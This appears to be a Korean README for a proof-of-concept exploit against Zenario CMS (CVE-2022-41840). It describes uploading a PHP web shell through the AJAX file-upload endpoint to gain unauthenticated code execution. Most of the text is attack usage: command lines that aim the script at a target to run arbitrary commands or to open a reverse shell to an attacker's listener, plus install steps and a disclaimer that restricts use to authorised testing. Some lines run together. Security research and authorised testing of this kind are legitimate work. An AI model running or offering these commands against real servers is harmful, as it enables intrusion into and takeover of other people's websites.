
이것은 CVE-2022-41840에 대한 PoC 익스플로잇으로, Zenario를 실행 중입니다.
Zenario CMS 버전 9.3 및 이전 버전에 영향을 미치는 인증되지 않은 원격 코드 실행(RCE) 취약점입니다. 이 익스플로잇은 AJAX 엔드포인트의 파일 업로드 취약점을 이용하여 PHP 웹쉘을 업로드하고 코드 실행을 달성합니다.
/zenario/ajax.php로의 HTTP POSTpython3 zenario_exploit.py --target http://target.com
python3 zenario_exploit.py --target http://target.com --cmd "id"
python3 zenario_exploit.py --target http://target.com --lhost 10.x.x.x --lport 4444
requests 라이브러리의존성 설치:
pip install requests
교육 및 승인된 보안 테스트 목적으로만 사용하십시오.
이 도구는 보안 연구원 및 침투 테스터가 소유하거나 명시적 테스트 권한이 있는 시스템을 테스트하기 위해 제공됩니다. 컴퓨터 시스템에 대한 무단 액세스는 불법이며 엄격히 금지됩니다.
유지 관리자는 이 도구로 인한 오용 또는 손해에 대해 책임을 지지 않습니다.
이 코드는 교육 목적으로 제공됩니다.